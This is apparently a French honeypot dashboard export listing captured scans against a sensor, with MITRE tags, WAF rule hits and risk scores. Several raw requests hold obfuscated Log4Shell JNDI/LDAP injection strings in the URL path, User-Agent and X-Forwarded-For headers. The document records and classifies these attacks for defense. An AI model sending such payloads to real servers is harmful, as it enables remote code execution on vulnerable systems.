|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8098
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +28
Risque capteur
Moyen
· 53
Confiance : Confiance 100 % — 3 tag(s) WAF
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8098 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8098 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8089 · HTTP | http | Scan de ports port scan syn · via HTTP:8089 · (reconnaissance) · → /login | Élevée | Élevé · 68 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8089
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8089 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Int
Requête brute (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8089 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/json Cont |
|||||||
| TCP | 8089 · HTTP | http | Scan de ports port scan syn · via HTTP:8089 · (reconnaissance) · → /${${8:4b:h3dy:-j}${yh:-n}${gu:-d}${0w:-i}${3xj… | Élevée | Élevé · 69 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
PUT /${${8:4b:h3dy:-j}${yh:-n}${gu:-d}${0w:-i}${3xj5:-:}${1wkg:bqc:jpc:-l}${l82:40bi:-d}${dgy9:iec:-a}$… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
PUT
/${${8:4b:h3dy:-j}${yh:-n}${gu:-d}${0w:-i}${3xj5:-:}${1wkg:bqc:jpc:-l}${l82:40bi:-d}${dgy9:iec:-a}${y8:u:aum:-p}${0e8:k:dzi1:-:}${f:rb:-/}${6:-/}${a:9lb2:-P}${x52g:-A}${9:2:-l}${hqbd:u8:2mks:-0}${qfm:-c}${uhjv:ak:d:--}${${s6ku:p:-s}${d:gz:-y}${glk:-s}${u7f:p:2cmk:-:}${r5w0:se3:gse:-j}${3ds4:-a}${uf5c:zy:fk:-v}${6zs0:n:-a}${z:0vr:ydzw:-.}${wae:dx6p:uin:-v}${ruo:efwj:-e}${kz:ez:-r}${d9ha:4:jn:-s}${36:2:75:-i}${od:-o}${j:chm:tbq:-n}}${w:yo4:-.}${g:-5}${p:-5}${l02:7onl:ko4:-7}${y:0u:6:-4}${wk3:yjtd:-3}${x5:-3}$
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
PUT
Port
8089
Chemin / cible
/${${8:4b:h3dy:-j}${yh:-n}${gu:-d}${0w:-i}${3xj5:-:}${1wkg:bqc:jpc:-l}${l82:40bi:-d}${dgy9:iec:-a}${y8:u:aum:-p}${0e8:k:dzi1:-:}${f:rb:-/}${6:-/}${a:9lb2:-P}${…
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Élevé
· 69
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
PUT /${${8:4b:h3dy:-j}${yh:-n}${gu:-d}${0w:-i}${3xj5:-:}${1wkg:bqc:jpc:-l}${l82:40bi:-d}${dgy9:iec:-a}${y8:u:aum:-p}${0e8:k:dzi1
Requête brute (extrait)
PUT /${${8:4b:h3dy:-j}${yh:-n}${gu:-d}${0w:-i}${3xj5:-:}${1wkg:bqc:jpc:-l}${l82:40bi:-d}${dgy9:iec:-a}${y8:u:aum:-p}${0e8:k:dzi1:-:}${f:rb:-/}${6:-/}${a:9lb2:-P}${x52g:-A}${9:2:-l}${hqbd:u8:2mks:-0}${qfm:-c}${uhjv:ak:d:--}${${s6ku:p:-s}${d:gz:-y}${glk:-s}$
|
|||||||
| TCP | 8089 · HTTP | http | Scan de ports port scan syn · via HTTP:8089 · (reconnaissance) · → /login | Élevée | Élevé · 68 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8089
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8089 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Int
Requête brute (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8089 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Length: 2923 Content-Type: |
|||||||
| TCP | 8089 · SPLUNK | splunk | Scan de ports port scan syn · via SPLUNK:8089 · (reconnaissance) | Faible | Moyen · 42 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
Émulateur
SPLUNK
WAF
—
Recommandation
Surveiller
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
8089
Chemin / cible
—
Service
SPLUNK
Payload
ZSDLKFJ2 /${${pmvw:-j}${s2:-n}${d:y:y:-d}${epao:b:-i}${0w:bg:-:}${8d:y:ca:-l}${10du:34o:-d}${m:-a}${0df:f:yt:-p}${7l:0:-:}${ka48
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 42
Confiance : Confiance élevée (100 %) — signaux convergents
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
ZSDLKFJ2 /${${pmvw:-j}${s2:-n}${d:y:y:-d}${epao:b:-i}${0w:bg:-:}${8d:y:ca:-l}${10du:34o:-d}${m:-a}${0df:f:yt:-p}${7l:0:-:}${ka48
Requête brute (extrait)
ZSDLKFJ2 /${${pmvw:-j}${s2:-n}${d:y:y:-d}${epao:b:-i}${0w:bg:-:}${8d:y:ca:-l}${10du:34o:-d}${m:-a}${0df:f:yt:-p}${7l:0:-:}${ka48:-/}${r38x:sbv7:152w:-/}${dnjc:-P}${5a:93d6:g2wt:-A}${d:9:sb9:-l}${jxo:w92x:n5u:-0}${l9hc:-c}${p:35g:oq9t:--}${${c:-s}${fz1:cgkj
|
|||||||
| TCP | 8089 · HTTP | http | Scan de ports port scan syn · via HTTP:8089 · (reconnaissance) · → /${${t5:j:tdr:-j}${zog5:t:8:-n}${zdhq:3pj9:w:-d… | Élevée | Élevé · 67 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET /${${t5:j:tdr:-j}${zog5:t:8:-n}${zdhq:3pj9:w:-d}${mf:-i}${f4b:-:}${0:-l}${sw8:nric:c:-d}${vx:ue6:-a… UA ${${njc5:-j}${d:-n}${n:v6:-d}${l:d:-i}${6:hql:-:}${d:7d4:-l}${g…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${t5:j:tdr:-j}${zog5:t:8:-n}${zdhq:3pj9:w:-d}${mf:-i}${f4b:-:}${0:-l}${sw8:nric:c:-d}${vx:ue6:-a}${fwd:-p}${wm7x:m8d:8li3:-:}${1:-/}${5v0x:ora7:-/}${10:ruf:ej:-P}${16:05p:-A}${bk:-l}${vf:-0}${o:-c}${s:yg1m:--}${${by:-s}${9:eroh:-y}${a:uz6:-s}${f:7hp:w06:-:}${j:we0:-j}${ej:f4i:-a}${l:gz:-v}${f492:gx6r:f:-a}${euk:tvr3:-.}${7c:-v}${orz:j7b:-e}${irzn:y:0dg5:-r}${fxvo:kd:-s}${y8h:ah:51v:-i}${l:z:-o}${v:n9wc:wv6:-n}}${6:lbcy:me:-.}${o25:-5}${n:x8q:-5}${nq:-7}${8szg:pk:-4}${hl2:-3}${w8:p:a:-3}${js3a:4:-d}${ps:l
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8089
Chemin / cible
/${${t5:j:tdr:-j}${zog5:t:8:-n}${zdhq:3pj9:w:-d}${mf:-i}${f4b:-:}${0:-l}${sw8:nric:c:-d}${vx:ue6:-a}${fwd:-p}${wm7x:m8d:8li3:-:}${1:-/}${5v0x:ora7:-/}${10:ruf:…
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +16
Risque capteur
Élevé
· 67
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${njc5:-j}${d:-n}${n:v6:-d}${l:d:-i}${6:hql:-:}${d:7d4:-l}${g:cy:-d}${eo1w:-a}${b:-p}${jki:lux:zbs:-:}${0:3lod:ok:-/}${nmoa:5n43:-/}${r1d:j:0:-U}${lc:ym7:-A}${j4:km2y:8uha:-l}${hp:jt:-0}${fg06:ik:-…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${t5:j:tdr:-j}${zog5:t:8:-n}${zdhq:3pj9:w:-d}${mf:-i}${f4b:-:}${0:-l}${sw8:nric:c:-d}${vx:ue6:-a}${fwd:-p}${wm7x:m8d:8li3
Requête brute (extrait)
GET /${${t5:j:tdr:-j}${zog5:t:8:-n}${zdhq:3pj9:w:-d}${mf:-i}${f4b:-:}${0:-l}${sw8:nric:c:-d}${vx:ue6:-a}${fwd:-p}${wm7x:m8d:8li3:-:}${1:-/}${5v0x:ora7:-/}${10:ruf:ej:-P}${16:05p:-A}${bk:-l}${vf:-0}${o:-c}${s:yg1m:--}${${by:-s}${9:eroh:-y}${a:uz6:-s}${f:7hp
|
|||||||
| TCP | 8090 · HTTP | http | Scan de ports port scan syn · via HTTP:8090 · (reconnaissance) | Élevée | Moyen · 57 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8090
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +16
Risque capteur
Moyen
· 57
Confiance : Confiance 100 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8090 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8090 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8089 · HTTP | http | Scan de ports port scan syn · via HTTP:8089 · (reconnaissance) | Élevée | Moyen · 57 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
POST / UA ${${o:fy:-j}${npf:-n}${v06:fb:-d}${k:reia:-i}${wn7:-:}${e:-l}${…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8089
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +16
Risque capteur
Moyen
· 57
Confiance : Confiance 100 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${o:fy:-j}${npf:-n}${v06:fb:-d}${k:reia:-i}${wn7:-:}${e:-l}${1:1syi:-d}${mi:q:whsq:-a}${a:5xsk:-p}${8z:-:}${l:a:-/}${5:f13y:-/}${okje:lux:-U}${n0lr:-A}${z1b:mxw1:-l}${jvm:-0}${m2:fp:qr:-c}${k2:wg:-…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1
Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8089
Accept: */*
User-Agent: ${${o:fy:-j}${npf:-n}${v06:fb:-d
Requête brute (extrait)
POST / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8089 Accept: */* User-Agent: ${${o:fy:-j}${npf:-n}${v06:fb:-d}${k:reia:-i}${wn7:-:}${e:-l}${1:1syi:-d}${mi:q:whsq:-a}${a:5xsk:-p}${8z:-:}${l:a:-/}${5:f13y:-/}${okje:lux:-U}${n0lr:-A}${z1b:m
|
|||||||
| TCP | 8089 · HTTP | http | Scan de ports port scan syn · via HTTP:8089 · (reconnaissance) · → /${${cb:eogf:-j}${j5md:-n}${d5mt:o0:94lu:-d}${m… | Élevée | Élevé · 67 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET /${${cb:eogf:-j}${j5md:-n}${d5mt:o0:94lu:-d}${mr:o:-i}${8tb:-:}${ud7q:d7tk:-l}${k84:t73:-d}${6i:z61… UA ${${q4:-j}${f:-n}${foa3:js:-d}${z:-i}${p:0n:1:-:}${8:s:5:-l}${f…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${cb:eogf:-j}${j5md:-n}${d5mt:o0:94lu:-d}${mr:o:-i}${8tb:-:}${ud7q:d7tk:-l}${k84:t73:-d}${6i:z61:-a}${v5u8:-p}${xka:-:}${nmo:-/}${h:6p:8:-/}${a:c:-P}${s29:5h:-A}${nui:-l}${5v:-0}${vx:-c}${mtk:p:--}${${pt:-s}${i7w:-y}${q:qoer:d:-s}${e4b:8pt:sfdv:-:}${d:xh1:-j}${rza:-a}${qu6:bv:-v}${r98:k4z:m9:-a}${ei:-.}${w:pd:-v}${lpt:7a2:-e}${xs2t:knt:erxp:-r}${tl:-s}${f56:6k:7dpa:-i}${e8:7m:aj:-o}${b:-n}}${lec8:7u:sa2h:-.}${s7je:nmlf:fco1:-5}${onq7:9a1:-5}${a7z3:-7}${57:ft:-4}${feut:dr8p:-3}${h5i:-3}${b:c:-d}${aw:b:-c}
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8089
Chemin / cible
/${${cb:eogf:-j}${j5md:-n}${d5mt:o0:94lu:-d}${mr:o:-i}${8tb:-:}${ud7q:d7tk:-l}${k84:t73:-d}${6i:z61:-a}${v5u8:-p}${xka:-:}${nmo:-/}${h:6p:8:-/}${a:c:-P}${s29:5…
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +16
Risque capteur
Élevé
· 67
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${q4:-j}${f:-n}${foa3:js:-d}${z:-i}${p:0n:1:-:}${8:s:5:-l}${fy9:d:-d}${0:f:-a}${i1n:ga:-p}${2nc:-:}${v4q:027:w:-/}${8v4:pm:-/}${65eh:0:2n:-U}${90:b4j:71m:-A}${7dsr:qh:sz:-l}${s9r:y:c:-0}${6rzx:-c}$…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${cb:eogf:-j}${j5md:-n}${d5mt:o0:94lu:-d}${mr:o:-i}${8tb:-:}${ud7q:d7tk:-l}${k84:t73:-d}${6i:z61:-a}${v5u8:-p}${xka:-:}${
Requête brute (extrait)
GET /${${cb:eogf:-j}${j5md:-n}${d5mt:o0:94lu:-d}${mr:o:-i}${8tb:-:}${ud7q:d7tk:-l}${k84:t73:-d}${6i:z61:-a}${v5u8:-p}${xka:-:}${nmo:-/}${h:6p:8:-/}${a:c:-P}${s29:5h:-A}${nui:-l}${5v:-0}${vx:-c}${mtk:p:--}${${pt:-s}${i7w:-y}${q:qoer:d:-s}${e4b:8pt:sfdv:-:}$
|
|||||||
| TCP | 8089 · HTTP | http | Scan de ports port scan syn · via HTTP:8089 · (reconnaissance) | Élevée | Élevé · 68 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
23
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8089
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +16
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
rce-14
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8089 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8089 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 X-Forwarded-For: ${${cv:4h:ky9:-j}${v:ykbf
|
|||||||